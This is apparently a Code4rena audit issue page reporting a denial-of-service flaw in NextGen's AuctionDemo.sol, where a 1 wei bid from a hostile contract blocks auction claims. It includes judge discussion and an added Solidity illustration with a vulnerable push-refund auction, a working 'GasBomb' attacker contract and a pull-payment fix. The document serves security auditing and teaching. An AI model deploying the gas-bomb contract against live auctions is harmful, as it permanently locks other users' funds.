Attacker can permanently DoS every auction in AuctionDemo
#1508
Comments
141345 marked the issue as duplicate of #1952
alex-ppg marked the issue as not a duplicate
alex-ppg marked the issue as primary issue
alex-ppg marked the issue as duplicate of #734
alex-ppg marked the issue as satisfactory
Hey @alex-ppg, can you consider choosing #1508 for the report over #734? Although #734 has a solid explanation and acknowledgment of the bot issues, it lacks a detailed attack path and a coded PoC; in fact, it merely states: "With the current implementation, a gas bomb can be implemented to perform the attack." In contrast, #1508 provides a valid/running PoC and a clear impact with the acknowledgment of #739 (left a comment there too). That being said, I am aware that a report being "better" is extremely subjective, and I will respect your final decision as a judge. Thanks!
Hey @0xbtk, thanks for your contribution to the PJQA process! I understand your concern and criticism but will retain my current judgment. Given that this submission refers to a direct escalation of a bot report finding, it must be mentioned for transparency. As such, I have opted to award the
Lines of code
https://github.com/code-423n4/2023-10-nextgen/blob/main/smart-contracts/AuctionDemo.sol#L104-L120
Vulnerability details
Impact
An attacker can disrupt every auction in AuctionDemo permanently by placing a minimal bid of 1 wei from a malicious contract as soon as the auction starts. This results in a permanent Denial-of-Service (DoS), effectively locking all user funds in the contract.
Note
Attackers can exploit this using onERC721Received too, but it is costlier since they need to be the highest bidder to claim the NFT.
Proof of Concept
Here is a coded PoC to demonstrate the issue:
Test Result:
Test Setup:
NextGenSecurityReview
forge test --mt testDoSAuctionDemo -vvv
Tools Used
Manual review
Recommended Mitigation Steps
To mitigate this vulnerability, consider implementing the following steps:
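The following is an added illustration written for this page, not NextGen's AuctionDemo.sol and not the submitter's PoC. It reduces the reported pattern to the minimum: a claim function that refunds every losing bidder with a push-style external call that forwards all remaining gas and only logs the result, a 1 wei bidder contract that burns all forwarded gas, and a pull-payment version that removes the external call from the loop. The contract names (AuctionBase, PushRefundAuction, GasBomb, PullRefundAuction), the omission of the NFT transfer and the admin/winner gating, and the bid bookkeeping are all simplifications assumed here for the example, not properties of the audited code.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Added illustration (not NextGen's code): a minimal auction exposing the
// refund-loop shape the report describes, and a pull-payment alternative.
abstract contract AuctionBase {
    struct Bid { address bidder; uint256 amount; }
    Bid[] public bids;
    uint256 public immutable endTime;
    bool public claimed;

    constructor(uint256 duration) { endTime = block.timestamp + duration; }

    function bid() external payable {
        require(block.timestamp < endTime, "auction ended");
        require(msg.value > 0, "zero bid");   // 1 wei is enough to enter the refund loop
        bids.push(Bid(msg.sender, msg.value));
    }

    function highest() public view returns (uint256 idx) {
        for (uint256 i = 1; i < bids.length; i++) {
            if (bids[i].amount > bids[idx].amount) idx = i;
        }
    }

    function _startClaim() internal returns (uint256 win) {
        require(block.timestamp >= endTime && !claimed, "not claimable");
        claimed = true;
        win = highest();
    }
}

// Vulnerable shape: every losing bidder is refunded with a push call that
// forwards all remaining gas; the call's success is only logged, never checked.
contract PushRefundAuction is AuctionBase {
    event Refund(address bidder, uint256 amount, bool success);
    constructor(uint256 d) AuctionBase(d) {}

    function claim() external {
        uint256 win = _startClaim();
        for (uint256 i = 0; i < bids.length; i++) {
            if (i == win) continue;
            (bool ok, ) = payable(bids[i].bidder).call{value: bids[i].amount}("");
            // A plain revert in the bidder's receive() is tolerated here (ok == false),
            // but a receive() that burns all forwarded gas leaves this frame only the
            // 1/64 retained under EIP-150, so the rest of claim() runs out of gas and
            // the whole transaction reverts, every time it is retried.
            emit Refund(bids[i].bidder, bids[i].amount, ok);
        }
    }
}

// Attacker-side gas bomb: enters the bidder list for 1 wei and, when the
// refund call arrives, executes INVALID, which consumes all gas given to it.
contract GasBomb {
    function enter(AuctionBase a) external payable { a.bid{value: msg.value}(); }
    receive() external payable {
        assembly { invalid() }
    }
}

// Hardened shape: claim() only records what each loser is owed and makes no
// external call; each bidder withdraws in their own transaction, so a hostile
// receiver can block nothing but its own refund.
contract PullRefundAuction is AuctionBase {
    mapping(address => uint256) public owed;
    constructor(uint256 d) AuctionBase(d) {}

    function claim() external {
        uint256 win = _startClaim();
        for (uint256 i = 0; i < bids.length; i++) {
            if (i != win) owed[bids[i].bidder] += bids[i].amount;
        }
    }

    function withdraw() external {
        uint256 amount = owed[msg.sender];
        require(amount > 0, "nothing owed");
        owed[msg.sender] = 0;   // effects before interaction (no reentrancy window)
        (bool ok, ) = payable(msg.sender).call{value: amount}("");
        require(ok, "refund failed");
    }
}
```

Two practical notes. First, the bomb is effective exactly when the work left after the poisoned refund (remaining refunds, the NFT transfer, the payout) exceeds the 1/64 of gas the calling frame keeps under EIP-150; bidding first with 1 wei, as the report describes, puts the bomb at the front of the loop so almost all of claim()'s work sits behind it. Second, if a push refund must be kept for some reason, a bounded gas stipend on the call (for example `call{value: amount, gas: 10_000}("")`) caps what any single receiver can burn, but it still leaves the refund's outcome unchecked; the pull pattern above is the cleaner fix because it removes the shared failure point entirely.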
Assessed type
DoS